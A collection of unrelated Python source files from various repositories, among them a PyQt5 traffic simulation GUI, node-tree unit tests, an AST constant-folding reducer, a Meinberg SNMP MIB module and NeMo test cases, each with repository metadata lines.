self.leftKey = True
elif keycode[1] == 'right':
self.rightKey = True
return True
def _on_keyboard_up(self, keyboard, keycode):
if keycode[1] == 'left':
self.leftKey = False
elif keycode[1] == 'right':
self.rightKey = False
return True
# Mouse callbacks
def on_touch_down(self, touch):
if touch.is_mouse_scrolling:
if touch.button == 'scrolldown':
if self.index > tls._MIN:
self.index = self.index - _SPEED
elif touch.button == 'scrollup':
if self.index < tls._MAX:
self.index = self.index + _SPEED
GridLayout.on_touch_down(self, touch)
def updateScroll(self, *args):
app = App.get_running_app()
if self.leftKey:
if self.leftCount >= 4:
self.velo = -4
else:
self.velo = self.velo - 1
elif self.rightKey:
if self.rightCount >= 4:
self.velo = 4
else:
self.velo = self.velo + 1
else:
self.velo = 0
self.leftCount = 0
self.rightCount = 0
if (self.index+self.velo) > tls._MAX or (self.index+self.velo) < tls._MIN:
if (self.index+self.velo) > tls._MAX:
self.index = tls._MAX
elif (self.index+self.velo) < tls._MIN:
self.index = tls._MIN
else:
self.index = self.index+self.velo
#print("moving : " + str(self.index))
try:
self.title.text = tls.getTimeByID(self.index)
self.image.source = tls.getImageByID(self.index)
except:
pass
# Timelapse Share auto-updating stuff
def TLS_update(self, *args):
#tls.updateStats();
if self.index > tls._MAX:
self.index = tls._MAX
if self.index < tls._MIN:
self.index = tls._MIN
try:
self.title.text = tls.getTimeByID(self.index)
self.image.source = tls.getImageByID(self.index)
except:
pass
class ScreenManagement(ScreenManager):
def __init__(self, *args, **kwargs):
super(ScreenManagement, self).__init__(*args, **kwargs)
self.DBscreen = DebugScreen(name='scrollDebug')
self.add_widget(self.DBscreen)
self.current = 'scrollDebug'
class MainApp(App):
def build(self):
self.manager = ScreenManagement(transition=NoTransition())
return(self.manager)
# Start the app
MainApp().run()
| 2.421875 | 2 |
GUI_code.py | MaazKhurram/Emergency-Response-System | 1 | 12799076 |
from PyQt5 import QtGui
from PyQt5.QtWidgets import QApplication,QMainWindow, QWidget, QPushButton
from PyQt5.QtGui import QPainter,QBrush, QPen
from PyQt5.QtCore import Qt
from PyQt5.QtCore import QTimer
from PyQt5.QtGui import QTransform
from PyQt5.QtCore import QPointF
from CarMaintainer import CarMaintainer
from Algorithm import Algorithm
class Window(QMainWindow):
STATE_OF_EMERGENCY=1
def __init__(self):
super().__init__()
timer = QTimer(self)
timer.setInterval(20) # interval in ms
timer.timeout.connect(self.update)
        timer.start()  # run with the 20 ms interval set above
self.title= "Emergency Response System"
self.top=100
self.left=100
self.width=500
self.height=500
#button = QPushButton('button', self)
#button.move(0,0)
#button.clicked.connect(self.on_click)
CarMaintainer()
Algorithm()
self.InitWindow()
def InitWindow(self):
self.setWindowIcon(QtGui.QIcon('icon.png'))
self.setWindowTitle(self.title)
self.setGeometry(self.top,self.left,self.width,self.height)
self.show()
def on_click(self):
Window.STATE_OF_EMERGENCY=1
def paintEvent(self, e):
painter= QPainter(self)
        reflecting_axis= QTransform(1,0,0,0,-1,0,250,250,1) #translate the coordinate system to the middle of the screen and reflect it about the x axis so positive y coordinates appear above the x axis
painter.setTransform(reflecting_axis)
painter.setPen(QPen(Qt.black,1,Qt.SolidLine))
painter.setBrush(QBrush(Qt.gray,Qt.SolidPattern))
painter.drawEllipse(QPointF(0,0),250,250) #draw outer lane
painter.setPen(QPen(Qt.yellow,5,Qt.DashLine))
painter.setBrush(QBrush(Qt.gray,Qt.SolidPattern))
painter.drawEllipse(QPointF(0,0),150,150) #draw inner lane
painter.setPen(QPen(Qt.black,2,Qt.SolidLine))
painter.setBrush(QBrush(Qt.black,Qt.SolidPattern))
painter.drawEllipse(QPointF(0,0),50,50) #black centre
# -------------------------------------------------------------------------------------------------------------
# Drawing lanes is complete. Now drawing cars
painter.setBrush(QBrush(Qt.green,Qt.SolidPattern))
counter=1
for point in Algorithm.run_algorithm(Window.STATE_OF_EMERGENCY):
if counter==1:
painter.drawEllipse(QPointF(point[0], point[1]),10,10)
counter=-1
else:
painter.drawEllipse(QPointF(point[0], point[1]),5,5)
counter=1
for a_car in CarMaintainer.Inner_Car_List:
if a_car.PSUEDO_CAR==False:
painter.drawEllipse(a_car.calculate_position(),a_car.CAR_GUI_RADIUS,a_car.CAR_GUI_RADIUS)
painter.drawText(a_car.calculate_position(),str(a_car.CarNumber))
else:
                painter.setPen(QPen(Qt.red,1,Qt.DashLine)) #new paint settings for pseudo car
painter.setBrush(QBrush(Qt.gray,Qt.NoBrush))
painter.drawEllipse(a_car.calculate_position(),a_car.CAR_GUI_RADIUS,a_car.CAR_GUI_RADIUS)
painter.drawText(a_car.calculate_position(),str(a_car.CarNumber))
                painter.setPen(QPen(Qt.black,2,Qt.SolidLine)) # restore paint settings after drawing a pseudo car
painter.setBrush(QBrush(Qt.green,Qt.SolidPattern))
for a_car in CarMaintainer.Outer_Car_List:
if a_car.IS_AMBULANCE == False :
painter.drawEllipse(a_car.calculate_position(),a_car.CAR_GUI_RADIUS,a_car.CAR_GUI_RADIUS)
painter.drawText(a_car.calculate_position(),str(a_car.CarNumber))
else:
painter.setBrush(QBrush(Qt.red,Qt.SolidPattern))
painter.drawEllipse(a_car.calculate_position(),a_car.CAR_GUI_RADIUS,a_car.CAR_GUI_RADIUS)
painter.drawText(a_car.calculate_position(),str(a_car.CarNumber))
painter.setBrush(QBrush(Qt.green,Qt.SolidPattern))
for a_car in CarMaintainer.In_Transition_List:
painter.setBrush(QBrush(Qt.yellow,Qt.SolidPattern))
painter.drawEllipse(a_car.calculate_position(),a_car.CAR_GUI_RADIUS,a_car.CAR_GUI_RADIUS)
painter.drawText(a_car.calculate_position(),str(a_car.CarNumber))
painter.setBrush(QBrush(Qt.green,Qt.SolidPattern))
painter.setPen(QPen(Qt.red,1,Qt.SolidLine))
painter.setBrush(QBrush(Qt.green,Qt.NoBrush))
        painter.drawEllipse(QPointF(0,0),100,100) #draw construction line on inner lane
        painter.drawEllipse(QPointF(0,0),200,200) #draw construction line on outer lane
painter.setPen(QPen(Qt.red,1,Qt.SolidLine))
painter.setBrush(QBrush(Qt.red,Qt.SolidPattern))
# painter.drawEllipse(QPointF(100,0),5,5)
# painter.drawEllipse(QPointF(-100,0),5,5)
# painter.drawEllipse(QPointF(0,-100),5,5)
painter.drawEllipse(QPointF(0,0),10,10)
| 2.8125 | 3 |
placidity/tests/test_node.py | bebraw/Placidity | 2 | 12799077 | # -*- coding: utf-8 -*-
from placidity.node import Node, TreeNode
class TestNode():
def test_append_children_to_node(self):
node1, node2 = Node(), Node()
node1.children.append(node2)
assert node1.children[0] == node2
assert node2.parents[0] == node1
def test_append_parents_to_node(self):
node1, node2 = Node(), Node()
node1.parents.append(node2)
assert node1.parents[0] == node2
assert node2.children[0] == node1
def test_append_same_node_as_child_and_parent(self):
node1, node2 = Node(), Node()
node1.children.append(node2)
node1.parents.append(node2)
assert node1.children[0] == node2
assert node1.parents[0] == node2
assert node2.children[0] == node1
assert node2.parents[0] == node1
def test_append_same_node_as_child_multiple_times(self):
node1, node2 = Node(), Node()
node1.children.append(node2)
node1.children.append(node2)
node1.children.append(node2)
assert node1.children[0] == node2
assert node2.parents[0] == node1
assert len(node1.children) == 1
assert len(node2.parents) == 1
def test_append_same_node_as_parent_multiple_times(self):
node1, node2 = Node(), Node()
node1.parents.append(node2)
node1.parents.append(node2)
node1.parents.append(node2)
assert node1.parents[0] == node2
assert node2.children[0] == node1
assert len(node1.parents) == 1
assert len(node2.children) == 1
def test_multi_append(self):
node1, node2, node3 = Node(), Node(), Node()
node1.children.append(node2, node3)
assert len(node1.children) == 2
assert node2 in node1.children
assert node3 in node1.children
def test_remove_child_node(self):
node1, node2 = Node(), Node()
node1.children.append(node2)
node1.children.remove(node2)
assert len(node1.children) == 0
assert len(node2.parents) == 0
def test_remove_parent_node(self):
node1, node2 = Node(), Node()
node1.parents.append(node2)
node1.parents.remove(node2)
assert len(node1.parents) == 0
assert len(node2.children) == 0
def test_remove_same_node_multiple_times(self):
node1, node2 = Node(), Node()
node1.parents.append(node2)
node1.parents.remove(node2)
node1.parents.remove(node2)
node1.parents.remove(node2)
assert len(node1.parents) == 0
assert len(node2.children) == 0
def test_multi_remove(self):
node1, node2, node3 = Node(), Node(), Node()
node1.children.append(node2, node3)
node1.children.remove(node2, node3)
assert len(node1.children) == 0
def test_find_immediate_child_node(self):
node1, node2 = Node(), Node()
node2.name = 'node to be found'
node1.children.append(node2)
assert node1.find_child(name='node to be found') == node2
def test_find_child_node_no_results(self):
node1 = Node()
assert node1.find_child(name='just some name') == None
def test_find_child_node_from_node_tree(self):
node1 = Node()
node1a = Node()
node1a1 = Node()
node1a1.color = 'blue'
node1a2 = Node()
node1a2.value = 13
node1b = Node()
node1b1 = Node()
node1b1.find_me = True
node1b1.color = 'blue'
node1.children.append(node1a, node1b)
node1a.children.append(node1a1, node1a2)
node1b.children.append(node1b1)
assert node1.find_child(value=13) == node1a2
assert node1.find_child(find_me=True) == node1b1
assert node1.find_child(color='blue') == [node1a1, node1b1]
def test_find_immediate_parent_node(self):
node1, node2 = Node(), Node()
node2.name = 'node to be found'
node1.parents.append(node2)
assert node1.find_parent(name='node to be found') == node2
def test_find_parent_node_no_results(self):
node1 = Node()
assert node1.find_parent(name='just some name') == None
def test_find_parent_node_from_node_tree(self):
node1 = Node()
node1a = Node()
node1a1 = Node()
node1a1.color = 'blue'
node1a2 = Node()
node1a2.value = 13
node1b = Node()
node1b1 = Node()
node1b1.find_me = True
node1b1.color = 'blue'
node1.parents.append(node1a, node1b)
node1a.parents.append(node1a1, node1a2)
node1b.parents.append(node1b1)
assert node1.find_parent(value=13) == node1a2
assert node1.find_parent(find_me=True) == node1b1
assert node1.find_parent(color='blue') == [node1a1, node1b1]
assert node1.find_parent(find_me=True, color='blue') == node1b1
def test_find_root(self):
node1, node1a, node1b, node1a1 = Node(), Node(), Node(), Node()
node1.children.append(node1a, node1b)
node1a.children.append(node1a1)
assert node1.find_root() == None
assert node1a.find_root() == node1
assert node1b.find_root() == node1
assert node1a1.find_root() == node1
def test_cyclic_find(self):
node1, node2 = Node(), Node()
node1.children.append(node2)
node2.children.append(node1)
assert node1.find_root() == None
assert node2.find_root() == None
def test_find_parent_with_value_name(self):
node1, node2, node3 = Node(), Node(), Node()
node3.attribute_to_find = 'find me'
node1.parents.append(node2)
node2.parents.append(node3)
assert node1.find_parent_with_attribute('attribute_to_find') == node3
def test_walk(self):
node1, node2, node3, node4 = Node(), Node(), Node(), Node()
node5 = Node()
node1.children.append(node2)
node1.children.append(node5)
node2.children.append(node3)
node2.children.append(node4)
result = (node1, node3, node4, node2, node5 )
for i, node in enumerate(node1.walk()):
assert node == result[i], '%s %s %s' % (i, node, result[i])
class TestTreeNode():
def test_set_parent(self):
node1, node2 = TreeNode(), TreeNode()
node1.parent = node2
assert node1.parent == node2
assert node2.children == [node1, ]
def test_set_parent_twice(self):
node1, node2, node3 = TreeNode(), TreeNode(), TreeNode()
node1.parent = node2
node1.parent = node3
assert node2.children == []
assert node3.children == [node1, ]
def test_find(self):
node1, node2, node3 = TreeNode(), TreeNode(), TreeNode()
node2.parent = node1
node3.parent = node1
node2.name = 'foo'
node3.name = 'bar'
assert node1.find(name='foo') == node2
assert node1.find(name='bar') == node3
assert node1.find(name='dummy') == None
assert node2.find(name='foo') == None
| 3.78125 | 4 |
GodwillOnyewuchi/Phase 1/Python Basic 2/day 9 task/task 7.py | CodedLadiesInnovateTech/-python-challenge-solutions | 6 | 12799078 | #Python program to test whether the system is a big-endian platform or little-endian platform
import sys
if sys.byteorder == "little":
print("Little-endian platform.") # its an intel, alpha
else:
print("Big-endian platform.") # its a motorola, sparc | 2.828125 | 3 |
python/bob/bob.py | fruit-in/exercism-solution | 9 | 12799079 | def response(hey_bob):
question = hey_bob.rstrip().endswith('?')
yell = any(c.isupper() for c in hey_bob) \
and not any(c.islower() for c in hey_bob)
nothing = not hey_bob.strip()
if question and not yell:
return "Sure."
elif not question and yell:
return "Whoa, chill out!"
elif question and yell:
return "Calm down, I know what I'm doing!"
elif nothing:
return "Fine. Be that way!"
else:
return "Whatever."
| 3.5625 | 4 |
setup.py | jicho/quicklock | 4 | 12799080 | from distutils.core import setup
setup(
name = 'quicklock',
packages = ['quicklock'],
version = '0.1.7',
description = 'A simple Python resource lock to ensure only one process at a time is operating with a particular resource.',
author = '<NAME>',
author_email = '<EMAIL>',
url = 'https://github.com/NateFerrero/quicklock',
download_url = 'https://github.com/NateFerrero/quicklock/tarball/0.1.7',
keywords = ['lock', 'locking', 'singleton', 'process', 'resource', 'exclusive lock'],
classifiers = [],
platforms='any',
install_requires = [
'psutil>=2.2'
]
)
| 1.632813 | 2 |
new_customers/models.py | bashmak/djing | 23 | 12799081 | <gh_stars>10-100
from django.shortcuts import resolve_url
from django.utils.translation import gettext_lazy as _
from django.db import models
from django.conf import settings
from django.core.validators import RegexValidator
from group_app.models import Group
class PotentialSubscriber(models.Model):
fio = models.CharField(_('fio'), max_length=256)
telephone = models.CharField(
max_length=16,
verbose_name=_('Telephone'),
blank=True,
null=True,
validators=(RegexValidator(
getattr(settings, 'TELEPHONE_REGEXP', r'^(\+[7893]\d{10,11})?$')
),)
)
group = models.ForeignKey(
Group,
on_delete=models.SET_NULL,
blank=True, null=True,
verbose_name=_('User group')
)
town = models.CharField(
_('Town'),
help_text=_('Town, if group does not already exist'),
max_length=127, blank=True, null=True
)
street = models.CharField(_('Street'), max_length=127, blank=True, null=True)
house = models.CharField(
_('House'),
max_length=12,
null=True,
blank=True
)
description = models.TextField(
_('Comment'),
null=True,
blank=True
)
make_data = models.DateTimeField(_('Create date'), auto_now_add=True)
deadline = models.DateField(
_('Deadline connection'),
help_text=_('Date when connection must be finished'),
blank=True, null=True
)
def get_absolute_url(self):
return resolve_url('new_customers:user', uid=self.pk)
class Meta:
db_table = 'new_customers'
verbose_name = _('Potential customer')
verbose_name_plural = _('Potential customers')
ordering = '-id',
| 2.0625 | 2 |
tests/cli/test_base.py | ssato/python-anyconfig | 213 | 12799082 | #
# Copyright (C) 2013 - 2021 <NAME> <<EMAIL>>
# License: MIT
#
# pylint: disable=missing-docstring
"""test cases for anyconfig.cli module.
"""
import contextlib
import io
import pathlib
import sys
import tempfile
import unittest
import anyconfig.api
import anyconfig.cli as TT
from .. import base
from . import collectors, datatypes
def make_args(_self, tdata):
"""Make arguments to run cli.main.
"""
return ['anyconfig_cli'] + tdata.opts + [str(tdata.inp_path)]
class BaseTestCase(unittest.TestCase):
"""Base Test case.
"""
collector = collectors.Collector()
make_args = make_args
def setUp(self):
if self.collector:
self.collector.init()
def post_checks(self, tdata, *args, **kwargs):
"""Placeholder to do more post checks.
"""
pass
def _run_main(self, tdata):
"""Wrapper for cli.main."""
args = self.make_args(tdata)
if tdata.outname: # Running cli.main will output files.
self.assertTrue(
tdata.ref is not None,
                f'No reference data was given, {tdata!r}'
)
with tempfile.TemporaryDirectory() as tdir:
opath = pathlib.Path(tdir) / tdata.outname
# Run anyconfig.cli.main with arguments.
TT.main(args + ['-o', str(opath)])
if tdata.exp.exit_code_matches and tdata.exp.exit_code == 0:
self.assertTrue(opath.exists(), str(opath))
try:
odata = anyconfig.api.load(opath, **tdata.oo_opts)
except anyconfig.api.UnknownFileTypeError:
odata = anyconfig.api.load(opath, ac_parser='json')
self.assertEqual(odata, tdata.ref, repr(tdata))
self.post_checks(tdata, opath)
else:
# Likewise but without -o <output_path> option.
TT.main(args)
self.post_checks(tdata)
sys.exit(0)
def run_main(self, tdata) -> None:
"""
Run anyconfig.cli.main and check if the exit code was expected one.
"""
expected: datatypes.Expected = tdata.exp
with self.assertRaises(expected.exception, msg=repr(tdata)) as ctx:
with contextlib.redirect_stdout(io.StringIO()) as stdout:
with contextlib.redirect_stderr(io.StringIO()) as stderr:
self._run_main(tdata)
exc = ctx.exception
self.assertTrue(isinstance(exc, expected.exception))
ecode = getattr(exc, 'error_code', getattr(exc, 'code', 1))
if expected.exit_code_matches:
self.assertEqual(ecode, expected.exit_code, f'{tdata!r}')
else:
self.assertNotEqual(ecode, expected.exit_code, f'{tdata!r}')
if expected.words_in_stdout:
msg = stdout.getvalue()
self.assertTrue(expected.words_in_stdout in msg, msg)
if expected.words_in_stderr:
err = stderr.getvalue()
self.assertTrue(expected.words_in_stderr in err, err)
def test_runs_for_datasets(self) -> None:
if self.collector and self.collector.initialized:
if self.collector.kind == base.TDataCollector.kind:
return
for tdata in self.collector.each_data():
self.run_main(tdata)
class NoInputTestCase(BaseTestCase):
"""Test cases which does not require inputs.
"""
def make_args(self, tdata): # pylint: disable=no-self-use
"""Make arguments to run cli.main.
"""
return ['anyconfig_cli'] + tdata.opts
# vim:sw=4:ts=4:et:
| 2.21875 | 2 |
tool/pylib/ecmascript/transform/optimizer/reducer.py | mever/qooxdoo | 1 | 12799083 | <gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
################################################################################
#
# qooxdoo - the new era of web development
#
# http://qooxdoo.org
#
# Copyright:
# 2006-2013 1&1 Internet AG, Germany, http://www.1und1.de
#
# License:
# MIT: https://opensource.org/licenses/MIT
# See the LICENSE file in the project's top-level directory for details.
#
# Authors:
# * <NAME> (thron7)
#
################################################################################
##
# Reduce the value of a syntax tree (expression).
##
import os, sys, re, types, operator, functools as func
from ecmascript.frontend import treeutil, treegenerator
from ecmascript.frontend.treegenerator import symbol
from ecmascript.frontend import Scanner
from misc import util
##
# ASTReducer - newer approach: A general AST reducer
#
# Computes new, pot. reduced tree. Does a post-order recursion (children first).
# Carries .evaluated with nodes, to keep the Python value for a tree/contant
# node, for easier operations, checking for hasattr() to determine
# evaluated-ness.
class ASTReducer(treeutil.NodeVisitor):
def __init__(self, root_node):
super(ASTReducer, self).__init__()
self.root_node = root_node
self.operations = self._init_operations()
def _init_operations(self):
operations = {}
types_Number = (types.IntType, types.LongType, types.FloatType, types.BooleanType)
def opr(operation, op1, op2):
if all([isinstance(x, types_Number) for x in (op1, op2)]):
return operation(op1, op2)
else:
return ()
operations['MUL'] = func.partial(opr, operator.mul)
operations['DIV'] = func.partial(opr, operator.truediv)
operations['MOD'] = func.partial(opr, operator.mod)
# Have to distinguish between prefix and infix +/-
def opr(operation, op1, op2=()):
result = ()
if isinstance(op1, types_Number):
# prefix +/-
if op2==():
if operation=='+':
result = operator.pos(op1)
elif operation=='-':
result = operator.neg(op1)
elif isinstance(op2, types_Number):
if operation=='+':
result = operator.add(op1,op2)
elif operation=='-':
result = operator.sub(op1,op2)
# string '+'
elif operation=='+' and all([isinstance(x,types.StringTypes) for x in (op1,op2)]):
result = operator.add(op1,op2)
return result
operations['ADD'] = func.partial(opr, '+')
operations['SUB'] = func.partial(opr, '-')
#operations['INC'] -- only on vars!
#operations['DEC'] -- only on vars!
operations['EQ'] = operator.eq
operations['SHEQ'] = operator.eq
operations['NE'] = operator.ne
operations['SHNE'] = operator.ne
operations['LT'] = operator.lt
operations['LE'] = operator.le
operations['GT'] = operator.gt
operations['GE'] = operator.ge
operations['NOT'] = operator.not_
operations['AND'] = lambda x,y: x and y
operations['OR'] = lambda x,y: x or y
# bit operations only operate on 32-bit integers in JS
operations['BITAND'] = operator.and_
operations['BITOR'] = operator.or_
operations['BITXOR'] = operator.xor
operations['BITNOT'] = operator.inv
# second shift operand must be in 0..31 in JS
def opr(operation, op1, op2):
op2 = (op2 & 0x1f) # coerce to 0..31
return operation(op1,op2)
operations['LSH'] = func.partial(opr, operator.lshift)
#def rsh(op1, op2): # http://bit.ly/13v4Adq
# sign = (op1 >> 31) & 1
# if sign:
# fills = ((sign << op2) - 1) << (32 - op2)
# else:
# fills = 0
# return ((op1 & 0xffffffff) >> op2) | fills
#operations['RSH'] = func.partial(opr, rsh)
operations['RSH'] = func.partial(opr, operator.rshift)
def ursh(op1, op2):
op1 = (op1 & 0xffffffff) # coerce to 32-bit int
return operator.rshift(op1, op2) # Python .rshift does 0 fill
operations['URSH'] = func.partial(opr, ursh)
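        # Worked example of the 32-bit shift semantics above (illustrative
        # only): in JS, 1 << 33 === 2, because the shift count is first
        # masked with 0x1f (33 & 0x1f == 1), which the shift wrappers mimic.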
# ?:
def opr(op1, op2, op3):
return op2 if bool(op1) else op3
operations['HOOK'] = opr
return operations
# end:_init_operations
def visit(self, node):
        # post-order: reduce the children first, so their values are available
        # when reducing the current node
nchilds = []
for child in node.children:
nchild = self.visit(child)
nchilds.append(nchild)
nnode = node
nnode.children = []
for cld in nchilds:
nnode.addChild(cld)
# try reducing current node, might return a fresh symbol()
if hasattr(self, "visit_"+node.type):
nnode = getattr(self, "visit_"+node.type)(nnode)
return nnode
    # - Due to the children-first (post-order) recursion, type-specific methods
    #   don't need to recurse anymore!
def visit_constant(self, node):
constvalue = node.get("value")
consttype = node.get("constantType")
value = () # the empty tuple indicates unevaluated
if consttype == "number":
constdetail = node.get("detail")
if constdetail == "int":
value = util.parseInt(constvalue)
elif constdetail == "float":
value = float(constvalue)
elif consttype == "string":
value = constvalue
elif consttype == "boolean":
value = {"true":True, "false":False}[constvalue]
elif consttype == "null":
value = None
if value!=():
node.evaluated = value
return node
def visit_operation(self, node):
operator = node.get("operator")
arity = len(node.children)
if arity == 1:
nnode = self._visit_monadic(node, operator)
elif arity == 2:
nnode = self._visit_dyadic(node, operator)
elif arity == 3:
nnode = self._visit_triadic(node, operator)
return nnode
##
# IF
def visit_loop(self, node):
loop_type = node.get("loopType")
nnode = node
if loop_type == "IF":
cond_node = node.children[0]
if hasattr(cond_node, "evaluated"):
value = bool(cond_node.evaluated)
nnode, is_empty = treeutil.inlineIfStatement(node, value, inPlace=False)
return nnode
##
# (group)
def visit_group(self, node):
nnode = node
# can only reduce "(3)" or "('foo')" or "(true)" etc.
if len(node.children)==1:
expr_node = node.children[0]
            if expr_node.type == 'constant': # already reduced by the children-first visit
nnode = expr_node
return nnode
def _visit_monadic(self, node, operator):
op1 = node.children[0]
nnode = node
if hasattr(op1, "evaluated"):
if operator in self.operations:
evaluated = self.operations[operator](op1.evaluated)
if evaluated!=():
nnode = symbol("constant")(
node.get("line"), node.get("column"))
set_node_type_from_value(nnode, evaluated)
nnode.evaluated = evaluated
return nnode
def _visit_dyadic(self, node, operator):
op1 = node.children[0]
op2 = node.children[1]
nnode = node
if operator in self.operations:
if operator in ['AND', 'OR'] and hasattr(op1, 'evaluated'): # short-circuit ops
evaluated = self.operations[operator](op1.evaluated, op2)
nnode = op1 if evaluated==op1.evaluated else op2
elif all([hasattr(x, 'evaluated') for x in (op1, op2)]):
evaluated = self.operations[operator](op1.evaluated, op2.evaluated)
if evaluated!=():
nnode = symbol("constant")(
node.get("line"), node.get("column"))
set_node_type_from_value(nnode, evaluated)
nnode.evaluated = evaluated
return nnode
##
# HOOK
def _visit_triadic(self, node, operator):
op1 = node.children[0]
op2 = node.children[1]
op3 = node.children[2]
nnode = node
if operator in self.operations:
# to evaluate HOOK, it is enough to evaluate the condition
if operator == "HOOK" and hasattr(op1, 'evaluated'):
nnode = self.operations[operator](op1.evaluated, op2, op3)
return nnode
##
# Take a Python value and init a constant node with it, setting the node's "constantType"
#
def set_node_type_from_value(valueNode, value):
if isinstance(value, types.StringTypes):
valueNode.set("constantType","string")
quotes, escaped_value = escape_quotes(value)
valueNode.set("detail", quotes)
valueNode.set("value", escaped_value)
elif isinstance(value, types.BooleanType):
# this has to come early, as isinstance(True, types.IntType) is also true!
valueNode.set("constantType","boolean")
valueNode.set("value", str(value).lower())
elif isinstance(value, (types.IntType, types.LongType)):
valueNode.set("constantType","number")
valueNode.set("detail", "int")
valueNode.set("value", str(value))
elif isinstance(value, types.FloatType):
valueNode.set("constantType","number")
valueNode.set("detail", "float")
valueNode.set("value", str(value))
elif isinstance(value, types.NoneType):
valueNode.set("constantType","null")
valueNode.set("value", "null")
else:
raise ValueError("Illegal value for JS constant: %s" % str(value))
return valueNode
##
# Determine the quoting to be used on that string in code ('singlequotes',
# 'doublequotes'), and escape pot. embedded quotes correspondingly.
# (The string might result from a concat operation that combined differently
# quoted strings, like 'fo"o"bar' + "ba"\z\"boing").
#
def escape_quotes(s):
    quotes = 'singlequotes' # arbitrary choice
result = s
# only if we have embedded quotes we have to check escaping
if "'" in s:
result = []
chunks = s.split("'")
for chunk in chunks[:-1]:
result.append(chunk)
if not Scanner.is_last_escaped(chunk + "'"):
result.append('\\')
result.append("'")
result.append(chunks[-1])
result = u''.join(result)
return quotes, result
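# Illustration of escape_quotes (added example, not from the original source):
# a plain string passes through unchanged, while an embedded single quote is
# escaped so the result can be emitted as a single-quoted JS string literal.
#   escape_quotes('foo')   ->  ('singlequotes', 'foo')
#   escape_quotes("it's")  ->  ('singlequotes', "it\\'s")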
# - ---------------------------------------------------------------------------
def ast_reduce(node):
reducer = ASTReducer(node)
new_node = reducer.visit(node)
return new_node
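# Hedged usage sketch (the parse step below is an assumption about the
# surrounding tool chain, not defined in this module): given a syntax tree
# for an expression such as "3 + 4 > 5", ast_reduce() folds it into a single
# constant node.
#   # tree = treegenerator.parse(tokens)   # hypothetical front-end call
#   # reduced = ast_reduce(tree)           # constant node with evaluated == True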
| 2.265625 | 2 |
agents/meinberg_m1000/mibs/MBG-SNMP-ROOT-MIB.py | simonsobs/socs | 6 | 12799084 | <reponame>simonsobs/socs<filename>agents/meinberg_m1000/mibs/MBG-SNMP-ROOT-MIB.py<gh_stars>1-10
#
# PySNMP MIB module MBG-SNMP-ROOT-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file://./MBG-SNMP-ROOT-MIB.mib
# Produced by pysmi-0.3.4 at Fri May 1 22:39:55 2020
# On host grumpy platform Linux version 4.15.0-88-generic by user bjk49
# Using Python version 3.6.9 (default, Apr 18 2020, 01:56:04)
#
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, ValueSizeConstraint, SingleValueConstraint, ValueRangeConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ValueSizeConstraint", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsIntersection")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
IpAddress, Gauge32, ModuleIdentity, Unsigned32, enterprises, Bits, Integer32, ObjectIdentity, iso, Counter64, NotificationType, TimeTicks, Counter32, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier = mibBuilder.importSymbols("SNMPv2-SMI", "IpAddress", "Gauge32", "ModuleIdentity", "Unsigned32", "enterprises", "Bits", "Integer32", "ObjectIdentity", "iso", "Counter64", "NotificationType", "TimeTicks", "Counter32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "MibIdentifier")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
mbgSnmpRoot = ModuleIdentity((1, 3, 6, 1, 4, 1, 5597))
mbgSnmpRoot.setRevisions(('2012-01-25 07:45', '2011-10-14 06:30',))
if mibBuilder.loadTexts: mbgSnmpRoot.setLastUpdated('201201250745Z')
if mibBuilder.loadTexts: mbgSnmpRoot.setOrganization('Meinberg Radio Clocks GmbH & Co. KG')
class MeinbergSwitch(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1))
namedValues = NamedValues(("off", 0), ("on", 1))
mibBuilder.exportSymbols("MBG-SNMP-ROOT-MIB", mbgSnmpRoot=mbgSnmpRoot, MeinbergSwitch=MeinbergSwitch, PYSNMP_MODULE_ID=mbgSnmpRoot)
| 1.703125 | 2 |
tests/core/test_neural_modules_pytorch.py | borisdayma/NeMo | 0 | 12799085 | <reponame>borisdayma/NeMo<gh_stars>0
# ! /usr/bin/python
# -*- coding: utf-8 -*-
# =============================================================================
# Copyright 2020 NVIDIA. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
# TODO: These test look bad/useless - redo
import unittest
import nemo
from nemo.backends.pytorch.nm import TrainableNM
from nemo.core.neural_types import ChannelType, NeuralType
from tests.common_setup import NeMoUnitTest
class TestNM1(TrainableNM):
def __init__(self, var1=1, var2=2, var3=3):
super(TestNM1, self).__init__()
class TestNM2(TestNM1):
def __init__(self, var2):
super(TestNM2, self).__init__(var2=var2)
class TestNeuralModulesPT(NeMoUnitTest):
def setUp(self) -> None:
super().setUp()
# Mockup abstract methods.
TestNM1.__abstractmethods__ = set()
TestNM2.__abstractmethods__ = set()
def test_default_init_params(self):
simple_nm = TestNM1(var1=1)
init_params = simple_nm.init_params
self.assertEqual(init_params["var1"], 1)
self.assertEqual(init_params["var2"], 2)
self.assertEqual(init_params["var3"], 3)
def test_simple_init_params(self):
simple_nm = TestNM1(var1=10, var3=30)
init_params = simple_nm.init_params
self.assertEqual(init_params["var1"], 10)
self.assertEqual(init_params["var2"], 2)
self.assertEqual(init_params["var3"], 30)
def test_nested_init_params(self):
simple_nm = TestNM2(var2="hello")
init_params = simple_nm.init_params
self.assertEqual(init_params["var2"], "hello")
def test_constructor_TaylorNet(self):
tn = nemo.backends.pytorch.tutorials.TaylorNet(dim=4)
self.assertEqual(tn.init_params["dim"], 4)
def test_call_TaylorNet(self):
x_tg = nemo.core.neural_modules.NmTensor(
producer=None,
producer_args=None,
name=None,
